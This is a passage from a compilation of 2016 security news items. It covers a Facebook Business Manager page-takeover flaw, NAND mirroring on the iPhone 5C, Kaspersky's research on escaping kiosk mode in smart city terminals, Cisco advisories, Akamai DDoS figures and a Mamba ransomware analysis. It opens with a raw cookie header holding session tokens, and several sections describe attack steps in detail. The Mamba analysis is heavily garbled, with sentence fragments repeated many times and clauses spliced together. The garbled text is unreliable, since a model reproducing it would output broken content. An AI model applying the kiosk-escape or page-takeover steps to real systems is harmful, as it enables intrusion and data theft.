Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.8

Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6

What about hacking Facebook? How?

He changed the ‘asset id’ value with the one of the target page to hack, and also interchanged the ‘parent_business_id’ value with ‘agency_id’. He also changed the role value to ‘MANAGER’.

parent_business_id= 991079870975788

agency_id= 907970555981524

asset_id =190313461381022

hacking Facebook pages

With this simple trick, Sureshkumar demonstrated that hacking Facebook Pages was possible. He obtained admin rights on the business page.

Sureshkumar also published a video PoC of the attack.

The security expert reported the flaw to Facebook on August 29, 2016. Facebook investigated the problem and discovered also another flaw in its platform.

The giant of the social networks awarded Sureshkumar with 16,000 USD as part of its bug bounty program.


Instead of spending $1.3 million, FBI could have Hacked iPhone in just $100
17.9.2016 thehackernews Apple
Do you remember the infamous encryption fight between the FBI and Apple for unlocking an iPhone 5C belongs to a terrorist?
Yes, you got it right, the same Apple vs. FBI case where the FBI paid almost $1.3 Million to a group of hackers to unlock that iPhone.
However, if the agency had shown some patience to explore more ways to get into that iPhone, then it might have cost them nothing less than US$100.
Yes, you heard that right. Now anyone can unlock an iPhone for less than $100, for which the FBI paid more than $1 million.
Cheap Method to Unlock iPhone 5C
Cambridge University security researcher Sergei Skorobogatov has published a new research paper detailing a technique that would have helped the FBI bypass the iOS passcode limit on the shooter's iPhone 5C.
Dubbed NAND Mirroring, the technique was proposed to the FBI earlier this year, but the agency claimed that the method would not work. "It does not work," FBI Director James Comey said back in March, and instead paid a hefty amount to a contractor.
In his research paper published on Thursday, Skorobogatov says that the FBI was just wrong in its assessment of NAND Mirroring, but also spent $1 million of taxpayers' funds on a case that could have been solved for a few hundred dollars.
Here's How the Researcher Unlocked iPhone 5C:
NAND Mirroring technique "does not require any expensive and sophisticated equipment. All needed parts are low cost and were obtained from local electronics distributors," writes Skorobogatov.
During his test, Skorobogatov used store-bought equipment, stripped down an iPhone 5C running iOS 9.3, carefully removed the NAND memory chip from the phone’s circuit board, and copied its data to a special test board many times over.
The researcher then used an automated software to brute force the passcode until he found the correct code and said it takes around 20 hours to brute-force a four-digit passcode, while few weeks with a six-digit one.
"This is the first public demonstration of…the real hardware mirroring process for iPhone 5C," Skorobogatov writes. "Any attacker with sufficient technical skills could repeat the experiments."
So far, the FBI and Apple have not commented on Skorobogatov's research.
The Method Works on iPhone 5S and iPhone 6 Devices
Besides iPhone 5C, his attack also works on iPhone 5S as well as iPhone 6 devices using the same type of NAND Flash memory. The attack can also be adapted on other iPhones using different NANDs.
For more technical details about this technique to bypass iPhone's passcode security limit, you can head onto his research paper.
You can also watch the video demonstration, where Skorobogatov explained the NAND Mirroring technique.

Fooling the ‘Smart City’
17.9.2016 Kaspersky  Security
The concept of a smart city involves bringing together various modern technologies and solutions that can ensure comfortable and convenient provision of services to people, public safety, efficient consumption of resources, etc. However, something that often goes under the radar of enthusiasts championing the smart city concept is the security of smart city components themselves. The truth is that a smart city’s infrastructure develops faster than security tools do, leaving ample room for the activities of both curious researchers and cybercriminals.

Smart Terminals Have Their Weak Points Too

Parking payment terminals, bicycle rental spots and mobile device recharge stations are abundant in the parks and streets of modern cities. At airports and passenger stations, there are self-service ticket machines and information kiosks. In movie theaters, there are ticket sale terminals. In clinics and public offices, there are queue management terminals. Even some paid public toilets now have payment terminals built into them, though not very often.

Fooling the 'Smart City'

Ticket terminals in a movie theater

However, the more sophisticated the device, the higher the probability that it has vulnerabilities and/or configuration flaws. The probability that smart city component devices will one day be targeted by cybercriminals is far from zero. Сybercriminals can potentially exploit these devices for their ulterior purposes, and the scenarios of such exploitation come from the characteristics of such devices.

Many such devices are installed in public places
They are available 24/7
They have the same configuration across devices of the same type
They have a high user trust level
They process user data, including personal and financial information
They are connected to each other, and may have access to other local area networks
They typically have an Internet connection
Increasingly often, we see news on another electronic road sign getting hacked and displaying a “Zombies ahead” or similar message, or news about vulnerabilities detected in traffic light management or traffic control systems. However, this is just the tip of the iceberg; smart city infrastructure is not limited to traffic lights and road signs.

We decided to analyze some smart city components:

Touch-screen payment kiosks (tickets, parking etc.)
Infotainment terminals in taxis
Information terminals at airports and railway terminals
Road infrastructure components: speed cameras, traffic routers
Smart City Terminals

From a technical standpoint, nearly all payment and service terminals – irrespective of their purpose – are ordinary PCs equipped with touch screens. The main difference is that they have a ‘kiosk’ mode – an interactive graphical shell that blocks the user from accessing the regular operating system functions, leaving only a limited set of features that are needed to perform the terminal’s functions. But this is theory. In practice, as our field research has shown, most terminals do not have reliable protection preventing the user from exiting the kiosk mode and gaining access to the operating system’s functions.

Fooling the 'Smart City'

Exiting the kiosk mode

Techniques for Exiting the Kiosk Mode

There are several types of vulnerabilities that affect a large proportion of terminals. As a consequence, there are existing attack methods that target them.

The sequence of operations that can enable an attacker to exit the full-screen application is illustrated in the picture below.

Fooling the 'Smart City'

Methodology for analyzing the security of public terminals

Tap Fuzzing

The tap fuzzing technique involves trying to exit the full-screen application by taking advantage of incorrect handling when interacting with the full-screen application. A hacker taps screen corners with his fingers and tries to call the context menu by long-pressing various elements of the screen. If he is able to find such weak points, he tries to call one of the standard OS menus (printing, help, object properties, etc.) and gain access to the on-screen keyboard. If successful, the hacker gets access to the command line, which enables him to do whatever he wants in the system – explore the terminal’s hard drive in search of valuable data, access the Internet or install unwanted applications, such as malware.

Data Fuzzing

Data fuzzing is a technique that, if exploited successfully, also gives an attacker access to the “hidden” standard OS elements, but by using a different technique. To exit the full-screen application, the hacker tries filling in available data entry fields with various data in order to make the ‘kiosk’ work incorrectly. This can work, for example, if the full-screen application’s developer did not configure the filter checking the data entered by the user properly (string length, use of special symbols, etc.). As a result, the attacker can enter incorrect data, triggering an unhandled exception: as a result of the error, the OS will display a window notifying the user of the problem.

Once an element of the operating system’s standard interface has been brought up, the attacker can access the control panel, e.g., via the help section. The control panel will be the starting point for launching the virtual keyboard.

Other Techniques

Yet another technique for exiting the ‘kiosk’ is to search for external links that might enable the attacker to access a search engine site and then other sites. Due to developer oversight, many full-screen applications used in terminals contain links to external resources or social networks, such as VKontakte, Facebook, Google+, etc. We have found external links in the interface of cinema ticket vending machines and bike rental terminals, described below.

One more scenario of exiting the full-screen application is using standard elements of the operating system’s user interface. When using an available dialog window in a Windows-based terminal, an attacker is sometimes able to call the dialog window’s control elements, which enables him to exit the virtual ‘kiosk’.

Fooling the 'Smart City'

Exiting the full-screen application of a cinema ticket vending terminal

Bike Rental Terminals

Cities in some countries, including Norway, Russia and the United States, are dotted with bicycle rental terminals. Such terminals have touch-screen displays that people can use to register if they want to rent a bike or get help information.

Fooling the 'Smart City'

Status bar containing a URL

We found that the terminal system shown above has a curious feature. The Maps section was implemented using Google maps, and the Google widget includes a status bar, which contains “Report an Error”, “Privacy Policy” and “Terms of Use” links, among other information. Tapping on any of these links brings up a standard Internet Explorer window, which provides access to the operating system’s user interface.

The application includes other links, as well: for example, when viewing some locations on the map, you can tap on the “More Info” button and open a web page in the browser.

Fooling the 'Smart City'

The Internet Explorer opens not only a web page, but also a new opportunity for the attacker

It turned out that calling up the virtual keyboard is not difficult either. By tapping on links on help pages, an attacker can access the Accessibility section, which is where the virtual keyboard can be found. This configuration flaw enables attackers to execute applications not needed for the device’s operation.

Running cmd.exe demonstrates yet another critical configuration flaw: the operating system’s current session is running with administrator privileges, which means that an attacker can easily execute any application.

Fooling the 'Smart City'

The current Windows session is running with administrator privileges

In addition, an attacker can get the NTLM hash of the administrator password. It is highly probable that the password used on this device will work for other devices of the same type, as well.

Note that, in this case, an attacker can not only obtain the NTLM hash – which has to be brute-force cracked to get the password – but the administrator password itself, because passwords can be extracted from memory in plain text.

An attacker can also make a dump of the application that collects information on people who wish to rent a bicycle, including their full names, email addresses and phone numbers. It is not impossible that the database hosting this information is stored somewhere nearby. Such a database would have an especially high market value, since it contains verified email addresses and phone numbers. If it cannot be obtained, an attacker can install a keylogger that will intercept all data entered by users and send it to a remote server.

Given that these devices work 24/7, they can be pooled together to mine cryptocurrency or used for hacking purposes seeing as an infected workstation will be online around the clock.

Particularly audacious cybercriminals can implement an attack scenario that will enable them to get customer payment data by adding a payment card detail entry form to the main window of the bike rental application. It is highly probable that users deceived by the cybercriminals will enter this information alongside their names, phone numbers and email addresses.

Terminals at Government Offices

Terminals at some government offices can also be easily compromised by attackers. For example, we have found a terminal that prints payment slips based on the data entered by users. After all fields have been filled with the relevant data, the user taps the “Create” button, after which the terminal opens a standard print window with all the print parameters and control tools for several seconds. Next, the “Print” button is automatically activated.

Fooling the 'Smart City'

A detail of the printing process on one of the terminals

An attacker has several seconds to tap the Change [printer] button and exit into the help section. From there, they can open the control panel and launch the on-screen keyboard. As a result, the attacker gets all the devices needed to enter information (the keyboard and the mouse pointer) and can use the computer for their own mercenary purposes, e.g., launch malware, get information on printed files, obtain the device’s administrator password, etc.

Public Devices at Airports

Self-service check-in kiosks that can be found at every modern airport have more or less the same security problems as the terminals described above. It is highly probable that they can be successfully attacked. An important difference between these kiosks and other similar devices is that some terminals at airports handle much more valuable information that terminals elsewhere.

Fooling the 'Smart City'

Exiting the kiosk mode by opening an additional browser window

Many airports have a network of computers that provide paid Internet access. These computers handle the personal data that users have to enter to gain access, including people’s full names and payment card numbers. These terminals also have a semblance of a kiosk mode, but, due to design faults, exiting this mode is possible. On the computers we have analyzed, the kiosk software uses the Flash Player to show advertising and at a certain point an attacker can bring up a context menu and use it to access other OS functions.

It is worth noting that web address filtering policies are used on these computers. However, access to policy management on these computers was not restricted, enabling an attacker to add websites to the list or remove them from it, offering a range of possibilities for compromising these devices. For example, the ability to access phishing pages or sites used to distribute malware potentially puts such computers at risk. And blacklisting legitimate sites helps to increase the chances of a user following a phishing link.

Fooling the 'Smart City'

List of addresses blocked by policies

We also discovered that configuration information used to connect to the database containing user data is stored openly in a text file. This means that, after finding a way to exit kiosk mode on one of these machines, anyone can get access to administrator credentials and subsequently to the customer database – with all the logins, passwords, payment details, etc.

Fooling the 'Smart City'

A configuration file in which administrator logins and password hashes are stored

Infotainment Terminals in Taxicabs

In the past years, Android devices embedded in the back of the front passenger seat have been installed in many taxicabs. Passengers in the back seat can use these devices to watch advertising, weather information, news and jokes that are not really funny. These terminals have cameras installed in them for security reasons.

The application that delivers the content also works in kiosk mode and exiting this mode is also possible.

Fooling the 'Smart City'

Exiting the kiosk mode on a device installed in a taxi makes it possible to download external applications

In those terminals that we were able to analyze, there was hidden text on the main screen. It can be selected using standard Android tools using a context menu. This leads to the search option being activated on the main screen. As a result, the shell stops responding, terminates and the device is automatically restarted. While the device is starting, all the hacker needs to do is exit to the main menu at the right time and open the RootExplorer – an Android OS file manager.

Fooling the 'Smart City'

Android interface and folder structure

This gives an attacker access to the terminal’s OS and all of its capabilities, including the camera. If the hacker has prepared a malicious application for Android in advance and hosted it on a server, that application can be used to remotely access the camera. In this case, the attacker can remotely control the camera, making videos or taking photos of what is going on in the taxi and uploading them to his server.

Fooling the 'Smart City'

Exiting the terminal’s full-screen application in a taxi gives access to the operating system’s functions

Our Recommendations

A successful attack can disrupt a terminal’s operation and cause direct financial damage to its owners. Additionally, a hacker can use a compromised terminal to hack into others, since terminals often form a network. After this, there are extensive possibilities for exploiting the network – from stealing personal data entered by users and spying on them (if the terminal has a camera or document scanner built into it) to stealing money (if the terminal accepts cash or bank cards).

To prevent malicious activity on public devices that have a touch interface, the developers and administrators of terminals located in public places should keep the following recommendations in mind:

The kiosk’s interactive shell should have no extra functions that enable the operating system’s menu to be called (such as right mouse click, links to external sites, etc.)
The application itself should be launched using sandboxing technology, such as jailroot, sandbox, etc. This will help to keep the application’s functionality limited to the artificial environment
Using a thin client is another method of protection. If a hacker manages to ‘kill’ an application, most of the valuable information will be stored on the server rather than the compromised device if the device is a thin client
The current operating system session should be launched with the restricted privileges of a regular user – this will make installing new applications much more difficult
A unique account with a unique password should be created on each device to prevent attackers who have compromised one of the terminals from using the password they have cracked to access other similar devices
Elements of the Road Infrastructure

The road infrastructure of modern cities is being gradually equipped with a variety of intelligent sensors, regulators, traffic analyzers, etc. All these sensors collect and send traffic density information to data centers. We looked at speedcams, which can be found everywhere these days.

Speed Cameras

We found speedcam IP addresses by pure chance, using the Shodan search engine. After studying several of these cameras, we developed a dork (a specific search request that identifies the devices or sites with pinpoint accuracy based on a specific attribute) to find as many IP addressed of these cameras as possible. We noticed a certain regularity in the IP addresses of these devices: in each city, all the cameras were on the same subnet. This enabled us to find those devices which were not shown in Shodan search results but which were on the same subnets with other cameras. This means there is a specific architecture on which these devices are based and there must be many such networks. Next, we scanned these and adjacent subnets on certain open ports and found a large number of such devices.

After determining which ports are open on speed cameras, we checked the hypothesis that one of them is responsible for RTSP – the real-time streaming protocol. The protocol’s architecture enables streaming to be either private (accessible with a login and password) or public. We decided to check that passwords were being used. Imagine our surprise when we realized there was no password and the entire video stream was available to all Internet users. Openly broadcast data includes not only the video stream itself, but additional data, such as the geographical coordinates of cameras, as well.

Fooling the 'Smart City'

Direct broadcast screenshot from a speed camera

We found many more open ports on these devices, which can also be used to get many interesting technical details, such as a list of internal subnets used by the camera system or the list of camera hardware.

We learned from the technical documentation that the cameras can be reprogrammed over a wireless channel. We also learned from documentation that cameras can detect rule violations on specified lanes, making it possible to disable detection on one of the lanes in the right place at the right time. All of this can be done remotely.

Let’s put ourselves in criminals’ shoes and assume they need to remain undetected in the car traffic after performing certain illegal actions. They can take advantage of speed camera systems to achieve this. They can disable vehicle detection on some or all lanes along their route or monitor the actions of law-enforcement agents chasing them.

In addition, a criminal can get access to a database of vehicles registered as stolen and can add vehicles to it or remove them from it.

We have notified the organizations responsible for operating speed cameras in those countries where we identified the above security issues.


We also analyzed another element of the road infrastructure – the routers that transfer information between the various smart city elements that are part of the road infrastructure or to data centers.

As we were able to find out, a significant part of these routers uses either weak password protection or none at all. Another widespread vulnerability is that the network name of most routers corresponds to their geographic location, i.e., the street names and building numbers. After getting access to the administration interface of one of these routers, an attacker can scan internal IP ranges to determine other routers’ addresses, thereby collecting information on their locations. After this, by analyzing road load sensors, traffic density information can be collected from these sensors.

Such routers support recording traffic and uploading it to an FTP server that can be created by an attacker. These routers can also be used to create SSH tunnels. They provide access to their firmware (by creating its backup copy), support Telnet connections and have many other capabilities.

These devices are indispensable for the infrastructure of a smart city. However, after gaining access to them, criminals can use them for their own purposes. For example, if a bank uses a secret route to move large amounts of cash, the route can be determined by monitoring information from all sensors (using previously gained access to routers). Next, the movements of the vehicles can be monitored using the cameras.

Our Recommendations

To protect speed cameras, a full-scale security audit and penetration testing must first be carried out. From this, well-thought-out IT security recommendations be prepared for those who provide installation and maintenance of such speed monitoring systems. The technical documentation that we were able to obtain does not include any information on security mechanisms that can protect cameras against external attacks. Another thing that needs to be checked is whether such cameras are assigned an external IP address. This should be avoided where possible. For security reasons, none of these cameras should be visible from the Internet.

The main issue with routers used in the road infrastructure is that there is no requirement to set up a password during initial loading and configuration of the device. Many administrators of such routers are too forgetful or lazy to do such simple things. As a result, gaining access to the network’s internal traffic is sufficiently easy.


The number of new devices used in the infrastructure of a modern city is gradually growing. These new devices in turn connect to other devices and systems. For this environment to be safe for people who live in it, smart cities should be treated as information systems whose protection requires a custom approach and expertise.

This article was prepared as part of the support provided by Kaspersky Lab to “Securing Smart Cities”, an international non-profit initiative created to unite experts in smart city IT security technologies. For further information about the initiative, please visit securingsmartcities.org


Cisco releases multiple Security Updates, it fixed a nasty RCE in WebEx Meetings servers
16.9.2016 securityaffairs Vulnerebility

Cisco has released several Security Updates to fix many vulnerabilities in its products, including a nasty RCE in WebEx Meetings servers.
Cisco has issued a patch to address the remote code execution flaw (CVE-2016-1482) that affects company WebEx Meetings servers.

The remote code execution flaw (CVE-2016-1482) could be exploited by remote, unauthenticated attackers to execute arbitrary commands on WebEx Meetings servers.

It is crucial for system administrators to apply the patch before hackers would exploit the vulnerability in attacks against their systems, Cisco highlighted that there is no workaround to mitigate the issue.

“A vulnerability in Cisco WebEx Meetings Server could allow an unauthenticated, remote attacker to bypass security restrictions on a host located in a DMZ and inject arbitrary commands on a targeted system,” Cisco reported in a security advisory.

As explained by the company the vulnerability in WebEx servers is the result of an insufficient sanitization of the user data. The attackers can exploit it to inject arbitrary commands into application scripts and compromise WebEx Meetings servers.

“The vulnerability is due to insufficient sanitization of user-supplied data processed by the affected software. An attacker could exploit this vulnerability by injecting arbitrary commands into existing application scripts running on a targeted device located in a DMZ [and] could allow an attacker to execute arbitrary commands on the device with elevated privileges.”

According to the advisory published by the company, Cisco WebEx Meetings Server version 2.6 is vulnerable to attacks that trigger the flaw.


Cisco also addressed other security issues in its products, including Denial of service flaws that affect Cisco’s Web Security Appliance, WebEx Meetings server, IOS XE software, and carrier routing system.

Another vulnerability affects that WebEx server, tracked as CVE-2016-1483 and rated as “high,” it is the result of the improper validation of user accounts by specific services.

“An unauthenticated, remote attacker could exploit this vulnerability by repeatedly attempting to access a specific service, causing the system to perform computationally intensive tasks and resulting in a denial of service attack condition.”

The US-CERT has published a warning of Cisco Releases Security Updates, inviting users to apply the necessary updates.

Below the complete list published by the US-CERT:

Cisco Web Security Appliance HTTP Load Denial of Service Vulnerability cisco-sa-20160914-wsa(link is external)
Cisco WebEx Meetings Server Denial of Service Vulnerability cisco-sa-20160914-wms(link is external)
Cisco WebEx Meetings Server Remote Command Execution Vulnerability cisco-sa-20160914-wem(link is external)
Cisco Unified Computing System Command Line Interface Privilege Escalation Vulnerability cisco-sa-20160914-ucs(link is external)
Cisco Fog Director for IOx Arbitrary File Write Vulnerability cisco-sa-20160914-ioxfd(link is external)
Cisco IOS XR for NCS6000 Series Devices OSPF Packet Processing Denial of Service Vulnerability cisco-sa-20160914-iosxr(link is external)
Cisco IOS and IOS XE Software Data in Motion Denial of Service Vulnerability cisco-sa-20160914-ios-xe(link is external)
Cisco IOS and IOS XE Software IOx Local Manager Cross-Site Scripting Vulnerability cisco-sa-20160914-ios(link is external)
Cisco Carrier Routing System IPv6 Denial of Service Vulnerability cisco-sa-20160914-crs
Hurry up, update your system now!

Akamai Q2 2016 report, the number of DDoS attacks has doubled in one year
16.9.2016 securityaffairs Attack

According to the Akamai Q2 2016 report, the number of distributed denial of service attacks has doubled over the last 12 months.
The DDoS attacks continue to be privileged attack vectors for crooks, according to the last report published by Akamai (Akamai Q2 2016 report) the number of distributed denial of service attacks has doubled over the last 12 months.

In Q2 Akamai experts have observed a 129 per cent year-on-year increase in total DDoS attacks, the company has mitigated in Q2 a total of 4,919 attacks.

One of these DDoS attacks hit a media company and reached a 363 Gbps, anyway 10 attacks reached out over 100 Gbps.

A close look at the type of attacks reveals that NTP reflection attacks almost quadrupled, increasing 276 percent over the same time frame.

Companies in the gaming and software industries are privileged targets of hackers that leverage on DDoS as an attack vector.

Akamai Q2 2016 report

Another worrisome trend is related to web application attacks that increased of 14 percent in Q2 2016 over Q1. SQL injection (44 per cent) and Local File Inclusion (45

The Akamai experts observed that retail industry was mostly targeted (40 per cent) with web application attacks in Q2 2016.

The Top 10 source countries for DDoS Attacks is Q2 2016 is led by China, with a considerable increase in frequency compared with Q1 2016, followed by the US.

“This quarter we saw Turkey end its streak as a top 10 source country for DDoS attacks, a trend that began in Q4 2015. After the US, in second place at 17%, the rest of the top 10 list was populated by countries seldom seen as DDoS sources. Taiwan (5%), Canada (4%), and Vietnam (4%) rounded out the top five. Canada appeared for the first time this quarter.” reads the report.

Below the Key findings of the Akamai Q2 2016 report, enjoy it!

DDoS attacks, Q2 2016 vs. Q2 2015

129% increase in total DDoS attacks
151% increase in infrastructure layer (layers 3 & 4) attacks
276% increase in NTP reflection attacks (a record high)
70% increase in UDP flood attacks
DDoS attacks, Q2 2016 vs. Q1 2016

9% increase in total DDoS attacks
10% increase in infrastructure layer (layers 3 & 4) attacks
47% increase in UDP flood attacks
37% decrease in attacks > 100 Gbps: 12 vs.
Web application attacks, Q2 2016 vs. Q1 2016

14% increase in total web application attacks
197% increase in attacks sourcing from Brazil (new top source country)
13% decrease in attacks sourcing from United States (previous top source country)
7% increase in SQLi attacks

Mamba: The new Full Disk Encryption Ransomware Family Member
16.9.2016 securityaffairs Virus

A Brazilian Infosec research group, Morphus Labs, just discovered a new Full Disk Encryption (FDE) Ransomware this week, dubbed Mamba.
Mamba, as they named it, uses a disk-level encryption strategy instead of the conventional file-based one. This may be just the beginning of a new era for the Ransomwares.

In this article, Renato Marinho (@renato_marinho), the researcher responsible for the finding, explains more about this new threat [1].

About Mamba
“You are Hacked ! H.D.D Encrypted, Contact Us For Decryption Key (w889901665@yandex.com) YOURID: 123152”. This message is all that remains for the victims of this new Ransomware. To get the decryption key, it’s necessary to contact somebody through the informed e-mail address, give the ID and pay 1 BTC per infected host. Without that, the system even starts. For the matter of this article, we will call this Ransomware “Mamba”, a snake with a paralyzing poison.for the victims of this new Ransomware. To get the decryption key, it’s necessary to contact somebody through the informed e-mail address, give the ID and pay 1 BTC per infected host. Without that, the system even starts. For the matter of this article, we will call this Ransomware “Mamba”, a snake with a paralyzing poison..for the victims of this new Ransomware. To get the decryption key, it’s necessary to contact somebody through the informed e-mail address, give the ID and pay 1 BTC per infected host. Without that, the system even starts. For the matter of this article, we will call this Ransomware “Mamba”, a snake with a paralyzing poison.

It seems that the disk level Ransomware family is growing. A similar Ransomware, called Petya, got famous march this year because of the disk encryption strategy, although some analysis [2] says that the malware encrypts the master file table (MFT) and not the data itself. But Mamba Ransomware differs from Petya exactly at this point. It uses a full disk encryption open source tool called DiskCryptor [3] to strongly encrypt the data.disk encryption strategy, although some analysis [2] says that the malware encrypts the master file table (MFT) and not the data itself. But Mamba Ransomware differs from Petya exactly at this point. It uses a full disk encryption open source tool called DiskCryptor [3] to strongly encrypt the data..disk encryption strategy, although some analysis [2] says that the malware encrypts the master file table (MFT) and not the data itself. But Mamba Ransomware differs from Petya exactly at this point. It uses a full disk encryption open source tool called DiskCryptor [3] to strongly encrypt the data..disk encryption strategy, although some analysis [2] says that the malware encrypts the master file table (MFT) and not the data itself. But Mamba Ransomware differs from Petya exactly at this point. It uses a full disk encryption open source tool called DiskCryptor [3] to strongly encrypt the data..disk encryption strategy, although some analysis [2] says that the malware encrypts the master file table (MFT) and not the data itself. But Mamba Ransomware differs from Petya exactly at this point. It uses a full disk encryption open source tool called DiskCryptor [3] to strongly encrypt the data.

We found Mamba last September 7, during an incident response procedure for a multinational company that had some servers compromised by this malware in Brazil, EUA and India subsidiaries.

The goal of this article is to share some Mamba analysis results and to get some collaboration to better understand this threat and its intrusion vectors.

The ransom message
As stated in the introduction of this article, the ransomware hinders the operating system to boot up. It overwrites the boot disk master boot record (MBR) by a custom one that shows the ransom message and asks for the password like you can see in the Figure 1.ransomware hinders the operating system to boot up. It overwrites the boot disk master boot record (MBR) by a custom one that shows the ransom message and asks for the password like you can see in the Figure 1.1.ransomware hinders the operating system to boot up. It overwrites the boot disk master boot record (MBR) by a custom one that shows the ransom message and asks for the password like you can see in the Figure 1.1.ransomware hinders the operating system to boot up. It overwrites the boot disk master boot record (MBR) by a custom one that shows the ransom message and asks for the password like you can see in the Figure 1.1.1.ransomware hinders the operating system to boot up. It overwrites the boot disk master boot record (MBR) by a custom one that shows the ransom message and asks for the password like you can see in the Figure 1.


Figure 1: The ransom message at the beginning of the boot process

It’s not clear, but this new MBR also prompts the user for the decryption password.

Looking for the malware sample
As the whole data of the compromised servers HDD ware encrypted, including the Ransomware itself, we started to look for more information about it somewhere else.

The first strategy was looking for some parts of the ransom message in the Web. For our surprise, putting the text in the Web. For our surprise, putting the text in the Web. For our surprise, putting the text in the Web. For our surprise, putting the text “contact us for decryption key” YOURID, we received just one result from Google. It pointed to an analysis made using Malwr [4] sandbox on Aug/29. This result gave us some important information, like the file name (141.exe) and the hashes.Malwr [4] sandbox on Aug/29. This result gave us some important information, like the file name (141.exe) and the hashes..Malwr [4] sandbox on Aug/29. This result gave us some important information, like the file name (141.exe) and the hashes..Malwr [4] sandbox on Aug/29. This result gave us some important information, like the file name (141.exe) and the hashes..Malwr [4] sandbox on Aug/29. This result gave us some important information, like the file name (141.exe) and the hashes.


Figure 2: Google results for parts of the ransom message

Searching the “141.exe” file hash at VirusTotal, we found some AV engines linking the sample to a Ransomware malware, like TrendMicro calling it a “Ransom_HDDCRYPTOR.A”.engines linking the sample to a Ransomware malware, like TrendMicro calling it a “Ransom_HDDCRYPTOR.A”.engines linking the sample to a Ransomware malware, like TrendMicro calling it a “Ransom_HDDCRYPTOR.A”.engines linking the sample to a Ransomware malware, like TrendMicro calling it a “Ransom_HDDCRYPTOR.A”.engines linking the sample to a Ransomware malware, like TrendMicro calling it a “Ransom_HDDCRYPTOR.A”.engines linking the sample to a Ransomware malware, like TrendMicro calling it a “Ransom_HDDCRYPTOR.A”.


Figure 3: TrendMicro’s analysis for the “141.exe” sample

At the same time, we started to seek for the malware on other hosts of the company’s network. After some effort, using an anti-malware solution, we started to find out a malicious file in some different hosts. The file name was “152.exe”.of the company’s network. After some effort, using an anti-malware solution, we started to find out a malicious file in some different hosts. The file name was “152.exe”..of the company’s network. After some effort, using an anti-malware solution, we started to find out a malicious file in some different hosts. The file name was “152.exe”..of the company’s network. After some effort, using an anti-malware solution, we started to find out a malicious file in some different hosts. The file name was “152.exe”..of the company’s network. After some effort, using an anti-malware solution, we started to find out a malicious file in some different hosts. The file name was “152.exe”.

Conducting some dynamic analysis of “152.exe” with the TIV and Hybrid-Analysis [5] sandboxes, we started to find some similarities between the Mamba’s memory dump strings and the ransom message. To say the truth, we found exactly the message “You are Hacked ! H.D.D Encrypted, Contact Us For Decryption Key (w889901665@yandex.com) YOURID: 123152” – even the “YOURID” was the same! ! H.D.D Encrypted, Contact Us For Decryption Key (w889901665@yandex.com) YOURID: 123152” – even the “YOURID” was the same!

By the way, we found it very curious the fact that the “YOURID” information in the sandbox analysis be the same as the company’s compromised hosts. In other words, it seems like this is a static code.be the same as the company’s compromised hosts. In other words, it seems like this is a static code..be the same as the company’s compromised hosts. In other words, it seems like this is a static code..be the same as the company’s compromised hosts. In other words, it seems like this is a static code..be the same as the company’s compromised hosts. In other words, it seems like this is a static code.

Mamba’s initial analysis
To better understand how Mamba works, we started to perform some tests with it in our lab. In a first test, we basically ran the sample in a Windows 8.1 VM, but, unfortunately nothing happened unless a log file in the directory “C:\DC22” saying the password wasn’t informed.

On a second try, we gave a password as a parameter and the result was different. Some other files were created in the “C:\DC22”, as can be seen in the image below.


Figure 4: files created as the result of 152.exe execution with a password argument

After a few seconds, the Windows restarted and, when returned, the operating system was apparently normal and these were the messages found in the “log_file.txt”:

installing driver…

installing driver successfully..

getting share drive information…

Trying to create service…

creating service successfully. rebooting windows…

From this messages we got some more information:

– A new service was created – it doesn’t mention the name;

– They are apparently using the tool DiskCryptor;

– Maybe they intend to get some credentials from the machine using “netpass.exe”;

– The “netuse.txt” lists the shared folders mapped by the user;

So, we used Regshot to discover some more information about the changes caused by the malware in the SO, including the new service created by the malware. As the result, we discovered that one of the new services was called “DefragmentService”. We also discovered that the malware created a new user in the machine called “mythbusters” with the password “123456”.

These are the new service information:


Figure 5: Fake DefragmentService created by Mamba

So, according to this service, after the machine reboot, “152.exe” was expected to be called with the same parameters we give in the first run. We follow watching the machine process, but no 152.exe was running.

Then, we tried to reboot the machine again to check if the ransom message should appear, but the system booted up normally again.

Performing some analysis on “dcrypt.exe” and “dccon.exe”, the DiskCryptor GUI and command like, respectively, we found that the password parameter is preceded by a “-p”. So, we tried run “152.exe” with this parameter before diving into the reverse engineering job.

For our surprise, this time the encryption process worked and the ransom message was shown during the boot. The only thing to note here is that the password was the “-p” itself and not the password given by the following parameter as we expected. So, the thing is, Mamba was expecting a second argument to run properly.

The process that encrypted the disk was the “dccon.exe”, called by the “152.exe”. During the process, it was possible to follow the encryption with the command “dccon -info pt0” and the result was like follows:


Figure 6: Full disk encrypted by the Mamba Ransomware.

After the reboot, that didn’t occur automatically, the ransom message was shown exactly the same as the company’s compromised machines.


Figure 7: Lab machine compromised

At this stage, the log file looks like that:

installing driver…

installing driver successfully..

getting share drive information…

Trying to create service…

creating service successfully. rebooting windows…

Checking resources existence. They are OK…

driver installed before…

starting serviceMain…

ServiceMain: Entry

ServiceMain: Performing Service Start Operations

ServiceMain: Waiting for Worker Thread to complete

ServiceWorkerThread: Entry

ServiceCtrlHandler: Entry

ServiceCtrlHandler: Exit

Starting Mount app…

Checking resources existence. They are OK…

driver installed before…




mount:mounting share drive…

mount:OS is win2003 or lower…

mount:share drive not found …

mount:exit Mount…

start hard drive encryption…

Checking resources existence. They are OK…

driver installed before…

Trying to create service…

As we can see, at some moment, the password used to encrypt the disk was printed to the log file.

Next steps
We’ve found some good information about this threat until now, but we didn’t find the infection vector yet. We know that the password used to encrypt the disk is given as a parameter, so, there may exists some script or other binary that calls the “152.exe” code giving it the clear text password that will be used. We also think that the password is the same for all the victims or may be something related to the victims’ environment, like the hostname, or something like that.

The actors in charge of this campaign seems to making some money. We contacted the e-mail address and they asked 1 BTC per infected machine.

This is the reply message we received:

andy saolis<w889901665@yandex.com>

Your HDD Encrypted By AES 2048Bit

